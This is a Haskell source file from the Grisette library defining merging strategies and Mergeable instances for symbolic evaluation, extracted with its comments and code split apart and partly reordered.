# INLINE liftRootStrategy #
-- ContT
instance (Mergeable1 m, Mergeable r) => Mergeable (ContT r m a) where
rootStrategy =
wrapStrategy
(liftRootStrategy rootStrategy1)
ContT
(\(ContT v) -> v)
# INLINE rootStrategy #
instance (Mergeable1 m, Mergeable r) => Mergeable1 (ContT r m) where
liftRootStrategy _ =
wrapStrategy
(liftRootStrategy rootStrategy1)
ContT
(\(ContT v) -> v)
# INLINE liftRootStrategy #
RWS
instance
(Mergeable s, Mergeable w, Mergeable a, Mergeable1 m) =>
Mergeable (RWSLazy.RWST r w s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy (liftRootStrategy rootStrategy1)) RWSLazy.RWST (\(RWSLazy.RWST m) -> m)
# INLINE rootStrategy #
instance
(Mergeable s, Mergeable w, Mergeable1 m) =>
Mergeable1 (RWSLazy.RWST r w s m)
where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy (liftRootStrategy3 m rootStrategy rootStrategy))))
RWSLazy.RWST
(\(RWSLazy.RWST rws) -> rws)
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable w, Mergeable a, Mergeable1 m) =>
Mergeable (RWSStrict.RWST r w s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy (liftRootStrategy rootStrategy1)) RWSStrict.RWST (\(RWSStrict.RWST m) -> m)
# INLINE rootStrategy #
instance
(Mergeable s, Mergeable w, Mergeable1 m) =>
Mergeable1 (RWSStrict.RWST r w s m)
where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy (liftRootStrategy3 m rootStrategy rootStrategy))))
RWSStrict.RWST
(\(RWSStrict.RWST rws) -> rws)
# INLINE liftRootStrategy #
-- Data.Monoid module
deriving via
(Default (Monoid.Sum a))
instance
(Mergeable a) => Mergeable (Monoid.Sum a)
deriving via (Default1 Monoid.Sum) instance Mergeable1 Monoid.Sum
#define MERGEABLE_SIMPLE(symtype) \
instance Mergeable symtype where \
rootStrategy = SimpleStrategy ites
#define MERGEABLE_BV(symtype) \
instance (KnownNat n, 1 <= n) => Mergeable (symtype n) where \
rootStrategy = SimpleStrategy ites
#define MERGEABLE_BV_SOME(symtype) \
instance Mergeable symtype where \
rootStrategy = SimpleStrategy ites
#define MERGEABLE_FUN(op) \
instance (SupportedPrim ca, SupportedPrim cb, LinkedRep ca sa, LinkedRep cb sb) => Mergeable (sa op sb) where \
rootStrategy = SimpleStrategy ites
#if 1
MERGEABLE_SIMPLE(SymBool)
MERGEABLE_SIMPLE(SymInteger)
MERGEABLE_BV(SymIntN)
MERGEABLE_BV(SymWordN)
MERGEABLE_BV_SOME(SomeSymIntN)
MERGEABLE_BV_SOME(SomeSymWordN)
MERGEABLE_FUN(=~>)
MERGEABLE_FUN(-~>)
#endif
-- Exceptions
instance Mergeable ArithException where
rootStrategy =
SortedStrategy
( \case
Overflow -> 0 :: Int
Underflow -> 1 :: Int
LossOfPrecision -> 2 :: Int
DivideByZero -> 3 :: Int
Denormal -> 4 :: Int
RatioZeroDenominator -> 5 :: Int
)
(const $ SimpleStrategy $ \_ l r -> l)
deriving via (Default BitwidthMismatch) instance (Mergeable BitwidthMismatch)
| null | https://raw.githubusercontent.com/lsrcz/grisette/1d2fab89acb160ee263a41741454a5825094bd33/src/Grisette/Core/Data/Class/Mergeable.hs | haskell | # LANGUAGE GADTs #
# LANGUAGE RankNTypes #
|
License : BSD-3-Clause (see the LICENSE file)
Maintainer :
Stability : Experimental
* Merging strategy
* Combinators for manually building merging strategies
# SOURCE #
| Helper type for combining arbitrary number of indices into one.
Useful when trying to write efficient merge strategy for lists/vectors.
# INLINE resolveStrategy #
| Resolves the indices and the terminal merge strategy for a value given a merge strategy for its type.
# INLINE resolveStrategy' #
| Merging strategies.
__You probably do not need to know the details of this type if you are only going__
__to use algebraic data types. You can get merging strategies for them with type__
__derivation.__
__/sorted representation invariant/__ with regards to some merging strategy.
A merging strategy encodes how to merge a __/subset/__ of the values of a
* Simple strategy
* Sorted strategy
* No strategy
For example,
* the symbolic boolean values can be directly merged with 'ites'.
* the set @{1}@, which is a subset of the values of the type @Integer@,
can be simply merged as the set contains only a single value.
* all the 'Just' values of the type @Maybe SymBool@ can be simply merged
by merging the wrapped symbolic boolean with 'ites'.
indexing function, and the values with the same index will be organized as
Each group (sub-tree) will be further merged with a sub-strategy for the
index.
into sub-trees, and organize them in a sorted way. The sub-trees will further
be merged with the sub-strategies. For example,
sub-strategies.
indexing with 'Data.Maybe.isJust', the 'Nothing' and 'Just' values can then
then be merged with different simple strategies as sub-strategies.
For example, we cannot merge values with function types that returns concrete
lists.
provides a merging strategy.
If the derived version does not work for you, you should determine
if your type can be directly merged with a merging function. If so, you can
If the type cannot be directly merged with a merging function, but could be
partitioned into subsets of values that can be simply merged with a function,
For easier building of the merging strategies, check out the combinators
For more details, please see the documents of the constructors, or refer to
| Simple mergeable strategy.
For symbolic booleans, we can implement its merge strategy as follows:
| Merge function.
| Sorted mergeable strategy.
For @Maybe SymBool@, we can implement its merge strategy as follows:
> (\case; Nothing -> False; Just _ -> True)
> (\idx ->
> then SimpleStrategy $ \_ t _ -> t
> else SimpleStrategy $ \cond (Just l) (Just r) -> Just $ ites cond l r)
| Indexing function
| Sub-strategy function
| For preventing the merging intentionally. This could be
useful for keeping some value concrete and may help generate more efficient
formulas.
details.
| Useful utility function for building merge strategies manually.
For example, to build the merge strategy for the just branch of @Maybe a@,
one could write
| The merge strategy to be wrapped
| The wrap function
| The unwrap function, which does not have to be defined for every value
The root merge strategy should be able to merge every value of the type.
a union.
| The root merging strategy for the type.
@DerivingStrategies@ extension.
| Lift merge strategy through the type constructor.
| Lift the root merge strategy through the unary type constructor.
| Lift merge strategy through the type constructor.
| Lift the root merge strategy through the binary type constructor.
| Lift merge strategy through the type constructor.
| Lift the root merge strategy through the binary type constructor.
# INLINE liftRootStrategy' #
# INLINE liftRootStrategy' #
# INLINE liftRootStrategy' #
# INLINE liftRootStrategy' #
# INLINE liftRootStrategy' #
# INLINE liftRootStrategy' #
# INLINE liftRootStrategy' #
# INLINE liftRootStrategy' #
| Useful utility function for building merge strategies for product types
manually.
For example, to build the merge strategy for the following product type,
one could write
> :: MergingStrategy X
| The wrap function
| The unwrap function, which does not have to be defined for every value
# INLINE product2Strategy #
instances
()
Either
Maybe
| Helper type for building efficient merge strategy for list-like containers.
| Helper function for building efficient merge strategy for list-like containers.
List
(,)
(,,)
(,,,)
(,,,,)
(,,,,,)
(,,,,,,)
(,,,,,,,)
function
MaybeT
ExceptT
state
writer
reader
Sum
Ordering
Identity
IdentityT
ContT
Data.Monoid module
Exceptions | # LANGUAGE CPP #
# LANGUAGE DataKinds #
# LANGUAGE DerivingVia #
# LANGUAGE FlexibleContexts #
# LANGUAGE FlexibleInstances #
# LANGUAGE KindSignatures #
# LANGUAGE LambdaCase #
# LANGUAGE MultiParamTypeClasses #
# LANGUAGE QuantifiedConstraints #
# LANGUAGE ScopedTypeVariables #
# LANGUAGE StandaloneDeriving #
# LANGUAGE Trustworthy #
# LANGUAGE TypeApplications #
# LANGUAGE TypeOperators #
# LANGUAGE UndecidableInstances #
Module : . Core . Data . Class .
Copyright : ( c ) 2021 - 2023
Portability : GHC only
module Grisette.Core.Data.Class.Mergeable
MergingStrategy (..),
*
Mergeable (..),
Mergeable1 (..),
rootStrategy1,
Mergeable2 (..),
rootStrategy2,
Mergeable3 (..),
rootStrategy3,
Mergeable' (..),
derivedRootStrategy,
wrapStrategy,
product2Strategy,
DynamicSortedIdx (..),
StrategyList (..),
buildStrategyList,
resolveStrategy,
resolveStrategy',
)
where
import Control.Exception
import Control.Monad.Cont
import Control.Monad.Except
import Control.Monad.Identity
import qualified Control.Monad.RWS.Lazy as RWSLazy
import qualified Control.Monad.RWS.Strict as RWSStrict
import Control.Monad.Reader
import qualified Control.Monad.State.Lazy as StateLazy
import qualified Control.Monad.State.Strict as StateStrict
import Control.Monad.Trans.Maybe
import qualified Control.Monad.Writer.Lazy as WriterLazy
import qualified Control.Monad.Writer.Strict as WriterStrict
import qualified Data.ByteString as B
import Data.Functor.Classes
import Data.Functor.Sum
import Data.Int
import Data.Kind
import qualified Data.Monoid as Monoid
import Data.Typeable
import Data.Word
import GHC.Natural
import qualified GHC.TypeLits
import GHC.TypeNats
import Generics.Deriving
import Grisette.Core.Data.BV
import Grisette.Core.Data.Class.Bool
import Grisette.IR.SymPrim.Data.Prim.InternedTerm.Term
import Unsafe.Coerce
data DynamicSortedIdx where
DynamicSortedIdx :: forall idx. (Show idx, Ord idx, Typeable idx) => idx -> DynamicSortedIdx
instance Eq DynamicSortedIdx where
(DynamicSortedIdx (a :: a)) == (DynamicSortedIdx (b :: b)) = case eqT @a @b of
Just Refl -> a == b
_ -> False
# INLINE (= =) #
instance Ord DynamicSortedIdx where
compare (DynamicSortedIdx (a :: a)) (DynamicSortedIdx (b :: b)) = case eqT @a @b of
Just Refl -> compare a b
_ -> error "This Ord is incomplete"
# INLINE compare #
instance Show DynamicSortedIdx where
show (DynamicSortedIdx a) = show a
| Resolves the indices and the terminal merge strategy for a value of some ' ' type .
resolveStrategy :: forall x. MergingStrategy x -> x -> ([DynamicSortedIdx], MergingStrategy x)
resolveStrategy s x = resolveStrategy' x s
resolveStrategy' :: forall x. x -> MergingStrategy x -> ([DynamicSortedIdx], MergingStrategy x)
resolveStrategy' x = go
where
go :: MergingStrategy x -> ([DynamicSortedIdx], MergingStrategy x)
go (SortedStrategy idxFun subStrategy) = case go ss of
(idxs, r) -> (DynamicSortedIdx idx : idxs, r)
where
idx = idxFun x
ss = subStrategy idx
go s = ([], s)
In , a merged union ( if - then - else tree ) follows the _ _ /hierarchical/ _ _
given type . We have three types of merging strategies :
The ' SimpleStrategy ' merges values with a simple merge function .
The ' SortedStrategy ' merges values by first grouping the values with an
a sub - tree in the if - then - else structure of ' . Core . Data . UnionBase . UnionBase ' .
The index type should be a totally ordered type ( with the ' '
type class ) . will use the indexing function to partition the values
* all the integers can be merged with ' SortedStrategy ' by indexing with
the identity function and use the ' SimpleStrategy ' shown before as the
* all the @Maybe SymBool@ values can be merged with ' SortedStrategy ' by
The ' ' does not perform any merging .
For , we can automatically derive the ' ' type class , which
implement the merging strategy as a ' SimpleStrategy ' .
you should implement the merging strategy as a ' SortedStrategy ' .
like ` wrapStrategy ` .
[ 's paper]( / files / POPL23.pdf ) .
data MergingStrategy a where
> SimpleStrategy ites : : MergingStrategy SymBool
SimpleStrategy ::
(SymBool -> a -> a -> a) ->
MergingStrategy a
For Integers , we can implement its merge strategy as follows :
> SortedStrategy i d ( \ _ - > SimpleStrategy $ \ _ t _ - > t )
> SortedStrategy
> if idx
SortedStrategy ::
(Ord idx, Typeable idx, Show idx) =>
(a -> idx) ->
(idx -> MergingStrategy a) ->
MergingStrategy a
See [ 's paper]( / files / POPL23.pdf ) for
NoStrategy :: MergingStrategy a
> wrapStrategy Just fromMaybe rootStrategy : : MergingStrategy ( Maybe a )
wrapStrategy ::
MergingStrategy a ->
(a -> b) ->
(b -> a) ->
MergingStrategy b
wrapStrategy (SimpleStrategy m) wrap unwrap =
SimpleStrategy
( \cond ifTrue ifFalse ->
wrap $ m cond (unwrap ifTrue) (unwrap ifFalse)
)
wrapStrategy (SortedStrategy idxFun substrategy) wrap unwrap =
SortedStrategy
(idxFun . unwrap)
(\idx -> wrapStrategy (substrategy idx) wrap unwrap)
wrapStrategy NoStrategy _ _ = NoStrategy
# INLINE wrapStrategy #
| Each type is associated with a root merge strategy given by ' rootStrategy ' .
will use the root merge strategy to merge the values of the type in
_ _ Note 1 : _ _ This type class can be derived for algebraic data types .
You may need the @DerivingVia@ and @DerivingStrategies@ extensions .
> data X = ... deriving Generic deriving via ( Default X )
class Mergeable a where
rootStrategy :: MergingStrategy a
instance (Generic a, Mergeable' (Rep a)) => Mergeable (Default a) where
rootStrategy = unsafeCoerce (derivedRootStrategy :: MergingStrategy a)
# NOINLINE rootStrategy #
| Generic derivation for the ' ' class .
Usually you can derive the merging strategy with the @DerivingVia@ and
> data X = ... deriving ( Generic ) deriving via ( Default X )
derivedRootStrategy :: (Generic a, Mergeable' (Rep a)) => MergingStrategy a
derivedRootStrategy = wrapStrategy rootStrategy' to from
# INLINE derivedRootStrategy #
| Lifting of the ' ' class to unary type constructors .
class Mergeable1 (u :: Type -> Type) where
liftRootStrategy :: MergingStrategy a -> MergingStrategy (u a)
rootStrategy1 :: (Mergeable a, Mergeable1 u) => MergingStrategy (u a)
rootStrategy1 = liftRootStrategy rootStrategy
# INLINE rootStrategy1 #
| Lifting of the ' ' class to binary type constructors .
class Mergeable2 (u :: Type -> Type -> Type) where
liftRootStrategy2 :: MergingStrategy a -> MergingStrategy b -> MergingStrategy (u a b)
rootStrategy2 :: (Mergeable a, Mergeable b, Mergeable2 u) => MergingStrategy (u a b)
rootStrategy2 = liftRootStrategy2 rootStrategy rootStrategy
# INLINE rootStrategy2 #
| Lifting of the ' ' class to ternary type constructors .
class Mergeable3 (u :: Type -> Type -> Type -> Type) where
liftRootStrategy3 :: MergingStrategy a -> MergingStrategy b -> MergingStrategy c -> MergingStrategy (u a b c)
rootStrategy3 :: (Mergeable a, Mergeable b, Mergeable c, Mergeable3 u) => MergingStrategy (u a b c)
rootStrategy3 = liftRootStrategy3 rootStrategy rootStrategy rootStrategy
# INLINE rootStrategy3 #
instance (Generic1 u, Mergeable1' (Rep1 u)) => Mergeable1 (Default1 u) where
liftRootStrategy = unsafeCoerce (derivedLiftMergingStrategy :: MergingStrategy a -> MergingStrategy (u a))
# NOINLINE liftRootStrategy #
class Mergeable1' (u :: Type -> Type) where
liftRootStrategy' :: MergingStrategy a -> MergingStrategy (u a)
instance Mergeable1' U1 where
liftRootStrategy' _ = SimpleStrategy (\_ t _ -> t)
instance Mergeable1' V1 where
liftRootStrategy' _ = SimpleStrategy (\_ t _ -> t)
instance Mergeable1' Par1 where
liftRootStrategy' m = wrapStrategy m Par1 unPar1
instance Mergeable1 f => Mergeable1' (Rec1 f) where
liftRootStrategy' m = wrapStrategy (liftRootStrategy m) Rec1 unRec1
instance Mergeable c => Mergeable1' (K1 i c) where
liftRootStrategy' _ = wrapStrategy rootStrategy K1 unK1
instance Mergeable1' a => Mergeable1' (M1 i c a) where
liftRootStrategy' m = wrapStrategy (liftRootStrategy' m) M1 unM1
instance (Mergeable1' a, Mergeable1' b) => Mergeable1' (a :+: b) where
liftRootStrategy' m =
SortedStrategy
( \case
L1 _ -> False
R1 _ -> True
)
( \idx ->
if not idx
then wrapStrategy (liftRootStrategy' m) L1 (\case (L1 v) -> v; _ -> error "impossible")
else wrapStrategy (liftRootStrategy' m) R1 (\case (R1 v) -> v; _ -> error "impossible")
)
instance (Mergeable1' a, Mergeable1' b) => Mergeable1' (a :*: b) where
liftRootStrategy' m = product2Strategy (:*:) (\(a :*: b) -> (a, b)) (liftRootStrategy' m) (liftRootStrategy' m)
| Generic derivation for the ' ' class .
derivedLiftMergingStrategy :: (Generic1 u, Mergeable1' (Rep1 u)) => MergingStrategy a -> MergingStrategy (u a)
derivedLiftMergingStrategy m = wrapStrategy (liftRootStrategy' m) to1 from1
# INLINE derivedLiftMergingStrategy #
| Auxiliary class for the generic derivation for the ' ' class .
class Mergeable' f where
rootStrategy' :: MergingStrategy (f a)
instance Mergeable' U1 where
rootStrategy' = SimpleStrategy (\_ t _ -> t)
# INLINE rootStrategy ' #
instance Mergeable' V1 where
rootStrategy' = SimpleStrategy (\_ t _ -> t)
# INLINE rootStrategy ' #
instance (Mergeable c) => Mergeable' (K1 i c) where
rootStrategy' = wrapStrategy rootStrategy K1 unK1
# INLINE rootStrategy ' #
instance (Mergeable' a) => Mergeable' (M1 i c a) where
rootStrategy' = wrapStrategy rootStrategy' M1 unM1
# INLINE rootStrategy ' #
instance (Mergeable' a, Mergeable' b) => Mergeable' (a :+: b) where
rootStrategy' =
SortedStrategy
( \case
L1 _ -> False
R1 _ -> True
)
( \idx ->
if not idx
then wrapStrategy rootStrategy' L1 (\case (L1 v) -> v; _ -> undefined)
else wrapStrategy rootStrategy' R1 (\case (R1 v) -> v; _ -> undefined)
)
# INLINE rootStrategy ' #
> data X = X { x1 : : Int , x2 : : }
> product2Strategy X ( \(X a b ) - > ( a , b ) ) rootStrategy rootStrategy
product2Strategy ::
(a -> b -> r) ->
(r -> (a, b)) ->
| The first merge strategy to be wrapped
MergingStrategy a ->
| The second merge strategy to be wrapped
MergingStrategy b ->
MergingStrategy r
product2Strategy wrap unwrap strategy1 strategy2 =
case (strategy1, strategy2) of
(NoStrategy, _) -> NoStrategy
(_, NoStrategy) -> NoStrategy
(SimpleStrategy m1, SimpleStrategy m2) ->
SimpleStrategy $ \cond t f -> case (unwrap t, unwrap f) of
((hdt, tlt), (hdf, tlf)) ->
wrap (m1 cond hdt hdf) (m2 cond tlt tlf)
(s1@(SimpleStrategy _), SortedStrategy idxf subf) ->
SortedStrategy (idxf . snd . unwrap) (product2Strategy wrap unwrap s1 . subf)
(SortedStrategy idxf subf, s2) ->
SortedStrategy (idxf . fst . unwrap) (\idx -> product2Strategy wrap unwrap (subf idx) s2)
instance (Mergeable' a, Mergeable' b) => Mergeable' (a :*: b) where
rootStrategy' = product2Strategy (:*:) (\(a :*: b) -> (a, b)) rootStrategy' rootStrategy'
# INLINE rootStrategy ' #
#define CONCRETE_ORD_MERGEABLE(type) \
instance Mergeable type where \
rootStrategy = \
let sub = SimpleStrategy $ \_ t _ -> t \
in SortedStrategy id $ const sub
#define CONCRETE_ORD_MERGEABLE_BV(type) \
instance (KnownNat n, 1 <= n) => Mergeable (type n) where \
rootStrategy = \
let sub = SimpleStrategy $ \_ t _ -> t \
in SortedStrategy id $ const sub
#if 1
CONCRETE_ORD_MERGEABLE(Bool)
CONCRETE_ORD_MERGEABLE(Integer)
CONCRETE_ORD_MERGEABLE(Char)
CONCRETE_ORD_MERGEABLE(Int)
CONCRETE_ORD_MERGEABLE(Int8)
CONCRETE_ORD_MERGEABLE(Int16)
CONCRETE_ORD_MERGEABLE(Int32)
CONCRETE_ORD_MERGEABLE(Int64)
CONCRETE_ORD_MERGEABLE(Word)
CONCRETE_ORD_MERGEABLE(Word8)
CONCRETE_ORD_MERGEABLE(Word16)
CONCRETE_ORD_MERGEABLE(Word32)
CONCRETE_ORD_MERGEABLE(Word64)
CONCRETE_ORD_MERGEABLE(B.ByteString)
CONCRETE_ORD_MERGEABLE_BV(WordN)
CONCRETE_ORD_MERGEABLE_BV(IntN)
#endif
instance Mergeable SomeIntN where
rootStrategy =
SortedStrategy @Natural
(\(SomeIntN (v :: IntN n)) -> natVal (Proxy @n))
( \n ->
SortedStrategy @Integer
(\(SomeIntN (IntN i)) -> toInteger i)
(const $ SimpleStrategy $ \_ l _ -> l)
)
instance Mergeable SomeWordN where
rootStrategy =
SortedStrategy @Natural
(\(SomeWordN (v :: WordN n)) -> natVal (Proxy @n))
( \n ->
SortedStrategy @Integer
(\(SomeWordN (WordN i)) -> toInteger i)
(const $ SimpleStrategy $ \_ l _ -> l)
)
deriving via (Default ()) instance Mergeable ()
deriving via (Default (Either e a)) instance (Mergeable e, Mergeable a) => Mergeable (Either e a)
deriving via (Default1 (Either e)) instance (Mergeable e) => Mergeable1 (Either e)
instance Mergeable2 Either where
liftRootStrategy2 m1 m2 =
SortedStrategy
( \case
Left _ -> False
Right _ -> True
)
( \case
False -> wrapStrategy m1 Left (\case (Left v) -> v; _ -> undefined)
True -> wrapStrategy m2 Right (\case (Right v) -> v; _ -> undefined)
)
# INLINE liftRootStrategy2 #
deriving via (Default (Maybe a)) instance (Mergeable a) => Mergeable (Maybe a)
deriving via (Default1 Maybe) instance Mergeable1 Maybe
data StrategyList container where
StrategyList ::
forall bool a container.
container [DynamicSortedIdx] ->
container (MergingStrategy a) ->
StrategyList container
buildStrategyList ::
forall bool a container.
(Functor container) =>
MergingStrategy a ->
container a ->
StrategyList container
buildStrategyList s l = StrategyList idxs strategies
where
r = resolveStrategy s <$> l
idxs = fst <$> r
strategies = snd <$> r
# INLINE buildStrategyList #
instance Eq1 container => Eq (StrategyList container) where
(StrategyList idxs1 _) == (StrategyList idxs2 _) = eq1 idxs1 idxs2
# INLINE (= =) #
instance Ord1 container => Ord (StrategyList container) where
compare (StrategyList idxs1 _) (StrategyList idxs2 _) = compare1 idxs1 idxs2
# INLINE compare #
instance Show1 container => Show (StrategyList container) where
showsPrec i (StrategyList idxs1 _) = showsPrec1 i idxs1
instance (Mergeable a) => Mergeable [a] where
rootStrategy = case rootStrategy :: MergingStrategy a of
SimpleStrategy m ->
SortedStrategy length $ \_ ->
SimpleStrategy $ \cond -> zipWith (m cond)
NoStrategy ->
SortedStrategy length $ const NoStrategy
_ -> SortedStrategy length $ \_ ->
SortedStrategy (buildStrategyList rootStrategy) $ \(StrategyList _ strategies) ->
let s :: [MergingStrategy a] = unsafeCoerce strategies
allSimple = all (\case SimpleStrategy _ -> True; _ -> False) s
in if allSimple
then SimpleStrategy $ \cond l r ->
(\case (SimpleStrategy f, l1, r1) -> f cond l1 r1; _ -> error "impossible") <$> zip3 s l r
else NoStrategy
# INLINE rootStrategy #
instance Mergeable1 [] where
liftRootStrategy (ms :: MergingStrategy a) = case ms of
SimpleStrategy m ->
SortedStrategy length $ \_ ->
SimpleStrategy $ \cond -> zipWith (m cond)
NoStrategy ->
SortedStrategy length $ const NoStrategy
_ -> SortedStrategy length $ \_ ->
SortedStrategy (buildStrategyList ms) $ \(StrategyList _ strategies) ->
let s :: [MergingStrategy a] = unsafeCoerce strategies
allSimple = all (\case SimpleStrategy _ -> True; _ -> False) s
in if allSimple
then SimpleStrategy $ \cond l r ->
(\case (SimpleStrategy f, l1, r1) -> f cond l1 r1; _ -> error "impossible") <$> zip3 s l r
else NoStrategy
# INLINE liftRootStrategy #
deriving via (Default (a, b)) instance (Mergeable a, Mergeable b) => Mergeable (a, b)
deriving via (Default1 ((,) a)) instance (Mergeable a) => Mergeable1 ((,) a)
instance Mergeable2 (,) where
liftRootStrategy2 = product2Strategy (,) id
# INLINE liftRootStrategy2 #
deriving via
(Default (a, b, c))
instance
(Mergeable a, Mergeable b, Mergeable c) => Mergeable (a, b, c)
deriving via
(Default1 ((,,) a b))
instance
(Mergeable a, Mergeable b) => Mergeable1 ((,,) a b)
instance (Mergeable a) => Mergeable2 ((,,) a) where
liftRootStrategy2 = liftRootStrategy3 rootStrategy
# INLINE liftRootStrategy2 #
instance Mergeable3 (,,) where
liftRootStrategy3 m1 m2 m3 =
product2Strategy
(\a (b, c) -> (a, b, c))
(\(a, b, c) -> (a, (b, c)))
m1
(liftRootStrategy2 m2 m3)
# INLINE liftRootStrategy3 #
deriving via
(Default (a, b, c, d))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d) =>
Mergeable (a, b, c, d)
deriving via
(Default1 ((,,,) a b c))
instance
(Mergeable a, Mergeable b, Mergeable c) =>
Mergeable1 ((,,,) a b c)
deriving via
(Default (a, b, c, d, e))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d, Mergeable e) =>
Mergeable (a, b, c, d, e)
deriving via
(Default1 ((,,,,) a b c d))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d) =>
Mergeable1 ((,,,,) a b c d)
deriving via
(Default (a, b, c, d, e, f))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f
) =>
Mergeable (a, b, c, d, e, f)
deriving via
(Default1 ((,,,,,) a b c d e))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d, Mergeable e) =>
Mergeable1 ((,,,,,) a b c d e)
deriving via
(Default (a, b, c, d, e, f, g))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f,
Mergeable g
) =>
Mergeable (a, b, c, d, e, f, g)
deriving via
(Default1 ((,,,,,,) a b c d e f))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f
) =>
Mergeable1 ((,,,,,,) a b c d e f)
deriving via
(Default (a, b, c, d, e, f, g, h))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f,
Mergeable g,
Mergeable h
) =>
Mergeable (a, b, c, d, e, f, g, h)
deriving via
(Default1 ((,,,,,,,) a b c d e f g))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f,
Mergeable g
) =>
Mergeable1 ((,,,,,,,) a b c d e f g)
instance (Mergeable b) => Mergeable (a -> b) where
rootStrategy = case rootStrategy @b of
SimpleStrategy m -> SimpleStrategy $ \cond t f v -> m cond (t v) (f v)
_ -> NoStrategy
# INLINE rootStrategy #
instance Mergeable1 ((->) a) where
liftRootStrategy ms = case ms of
SimpleStrategy m -> SimpleStrategy $ \cond t f v -> m cond (t v) (f v)
_ -> NoStrategy
# INLINE liftRootStrategy #
instance (Mergeable1 m, Mergeable a) => Mergeable (MaybeT m a) where
rootStrategy = wrapStrategy rootStrategy1 MaybeT runMaybeT
# INLINE rootStrategy #
instance (Mergeable1 m) => Mergeable1 (MaybeT m) where
liftRootStrategy m = wrapStrategy (liftRootStrategy (liftRootStrategy m)) MaybeT runMaybeT
# INLINE liftRootStrategy #
instance
(Mergeable1 m, Mergeable e, Mergeable a) =>
Mergeable (ExceptT e m a)
where
rootStrategy = wrapStrategy rootStrategy1 ExceptT runExceptT
# INLINE rootStrategy #
instance (Mergeable1 m, Mergeable e) => Mergeable1 (ExceptT e m) where
liftRootStrategy m = wrapStrategy (liftRootStrategy (liftRootStrategy m)) ExceptT runExceptT
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (StateLazy.StateT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) StateLazy.StateT StateLazy.runStateT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (StateLazy.StateT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy2 m rootStrategy)))
StateLazy.StateT
StateLazy.runStateT
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (StateStrict.StateT s m a)
where
rootStrategy =
wrapStrategy (liftRootStrategy rootStrategy1) StateStrict.StateT StateStrict.runStateT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (StateStrict.StateT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy2 m rootStrategy)))
StateStrict.StateT
StateStrict.runStateT
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (WriterLazy.WriterT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) WriterLazy.WriterT WriterLazy.runWriterT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (WriterLazy.WriterT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy2 m rootStrategy))
WriterLazy.WriterT
WriterLazy.runWriterT
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (WriterStrict.WriterT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) WriterStrict.WriterT WriterStrict.runWriterT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (WriterStrict.WriterT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy2 m rootStrategy))
WriterStrict.WriterT
WriterStrict.runWriterT
# INLINE liftRootStrategy #
instance
(Mergeable a, Mergeable1 m) =>
Mergeable (ReaderT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) ReaderT runReaderT
# INLINE rootStrategy #
instance (Mergeable1 m) => Mergeable1 (ReaderT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy m))
ReaderT
runReaderT
# INLINE liftRootStrategy #
instance
(Mergeable1 l, Mergeable1 r, Mergeable x) =>
Mergeable (Sum l r x)
where
rootStrategy =
SortedStrategy
( \case
InL _ -> False
InR _ -> True
)
( \case
False -> wrapStrategy rootStrategy1 InL (\case (InL v) -> v; _ -> error "impossible")
True -> wrapStrategy rootStrategy1 InR (\case (InR v) -> v; _ -> error "impossible")
)
# INLINE rootStrategy #
instance (Mergeable1 l, Mergeable1 r) => Mergeable1 (Sum l r) where
liftRootStrategy m =
SortedStrategy
( \case
InL _ -> False
InR _ -> True
)
( \case
False -> wrapStrategy (liftRootStrategy m) InL (\case (InL v) -> v; _ -> error "impossible")
True -> wrapStrategy (liftRootStrategy m) InR (\case (InR v) -> v; _ -> error "impossible")
)
# INLINE liftRootStrategy #
deriving via
(Default Ordering)
instance
Mergeable Ordering
Generic
deriving via
(Default (U1 x))
instance
Mergeable (U1 x)
deriving via
(Default (V1 x))
instance
Mergeable (V1 x)
deriving via
(Default (K1 i c x))
instance
(Mergeable c) => Mergeable (K1 i c x)
deriving via
(Default (M1 i c a x))
instance
(Mergeable (a x)) => Mergeable (M1 i c a x)
deriving via
(Default ((a :+: b) x))
instance
(Mergeable (a x), Mergeable (b x)) => Mergeable ((a :+: b) x)
deriving via
(Default ((a :*: b) x))
instance
(Mergeable (a x), Mergeable (b x)) => Mergeable ((a :*: b) x)
instance (Mergeable a) => Mergeable (Identity a) where
rootStrategy = wrapStrategy rootStrategy Identity runIdentity
# INLINE rootStrategy #
instance Mergeable1 Identity where
liftRootStrategy m = wrapStrategy m Identity runIdentity
# INLINE liftRootStrategy #
